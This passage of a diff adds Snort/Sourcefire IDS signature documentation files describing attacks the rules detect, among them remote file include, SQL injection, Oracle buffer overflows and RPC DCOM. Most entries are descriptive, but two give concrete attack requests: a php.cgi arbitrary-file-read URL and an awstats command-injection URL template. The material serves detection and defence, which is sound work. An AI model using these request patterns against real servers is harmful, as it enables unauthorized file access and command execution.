+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000547.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000547
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "manual_admin.php" using a remote file being 
+passed as the "DragonRootPath" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "manual_admin.php" 
+script used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/824.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+824
+
+--
+Summary:
+A remote user has tried access the php.cgi script. Some versions 
+of this script can allow access to any file the
+server can read.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Because of a design problem in this version of PHP/FI, remote users are 
+able to access any file that the UID of the http process has access to. 
+The exploit is a simple web request for the file and can be used with 
+malicious intent.
+
+--
+Affected Systems:
+	PHP/FI 2.0
+
+--
+Attack Scenarios:
+An attacker can simply pass a file name to the script 
+and be able to view the file if the web server has access
+to it. This can be used to obtain passwords or other sensitive 
+information.
+
+Example: http://somewebserver/php.cgi?/path/to/desired/file
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade or remove the file php.cgix
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS232
+
+Bugraq:
+http://www.securityfocus.com/bid/2250
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0238
+
+--
--- /dev/null
+++ b/doc/signatures/1383.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1383
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is 
+detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in 
+progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This 
+may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be 
+configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to 
+transfer company confidential information to unauthorized hosts external
+to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Any HTTP GET request to a port associated with a p2p application may
+generate a false positive event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000712.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000712
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "register.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "register.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1028.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1028
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2764.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2764
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_column_group_from_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2477.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2477
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/2614.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2614
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases allow a user to set a time zone for the session.
+The "alter session set time_zone" command contains a programming
+error that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in the parameter for the
+command.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string as the value for this command.
+The result could permit the attacker to gain escalated privileges and
+run code of their choosing. This attack requires an attacker to logon
+to the database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/9587
+
+Other:
+http://www.nextgenss.com/advisories/ora_time_zone.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000608.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000608
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_bad.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_bad.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1589.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1589
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2616.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2616
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "grant_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/3019.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3019
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2717.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2717
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure differences
+. This procedure is included in
+dbms_rectifier_diff.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3277.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3277
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3463.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3463
+
+--
+Summary:
+This event is generated when an attempt is made to access the cgi script
+awstats.pl.
+
+--
+Impact:
+Possible execution of system commands.
+
+--
+Detailed Information:
+Adavanced Web Statistics (awstats) is used to process web server log
+files and produces reports of web server usage.
+
+Some versions of awstats do not correctly sanitize user input. This may
+present an attacker with the opportunity to supply system commands via
+the "logfile" parameter. For the attack to be sucessful the "update"
+parameter must also have the value set to "1". This event indicates that
+an attempt has been made to access the awstats.pl cgi script.
+
+--
+Affected Systems:
+	Awstats 6.1 and prior
+
+--
+Attack Scenarios:
+An attacker can supply commands of their choosing as a value for the
+logfile parameter by enclosing the commands in pipe charecters. For
+example: 
+
+ http://www.foo.com/cgi-bin/awstats.pl?update=1&logfile=|<command here>|
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+Disallow access to awstats.pl as a CGI script.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3440.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3440
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2056.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2056
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server using the TRACE command.
+
+--
+Impact:
+Possible disclosure of information.
+
+--
+Detailed Information:
+The TRACE method is used when debugging a webserver to ensure that 
+server returns information to the client correctly. When used with other
+vulnerabilities it is possible to use the TRACE method to return 
+sensitive information from a webserver such as authentication data and 
+cookies.
+
+This is known as a Cross Site Tracing (XST) attack.
+
+--
+Affected Systems:
+All platforms running a webserver that responds to the TRACE method.
+
+--
+Attack Scenarios:
+The attacker needs to perform a TRACE request to a vulnerable server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The TRACE method is legitimate and may be used to debug a webserver or 
+can be used to debug other networking equipment.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the webserver from responding to TRACE requests.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/867593
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11213
+
+RFC:
+http://www.ietf.org/rfc/rfc2616.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000702.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000702
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Webvizyon" application running on a webserver. Access to the file "SayfalaAltList.asp" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "SayfalaAltList.asp" script used by the "Webvizyon" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Webvizyon
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1345.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted cpp command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The cpp
+command is theGNU project's C and C++ compiler used to compile C and
+C++ sourcefiles into executable binary files. The attacker could
+possibly compilea program needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains
+'/usr/bin/cpp'inthe URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested on acommand line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/2620.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2620
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000770.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000770
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "typeface" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
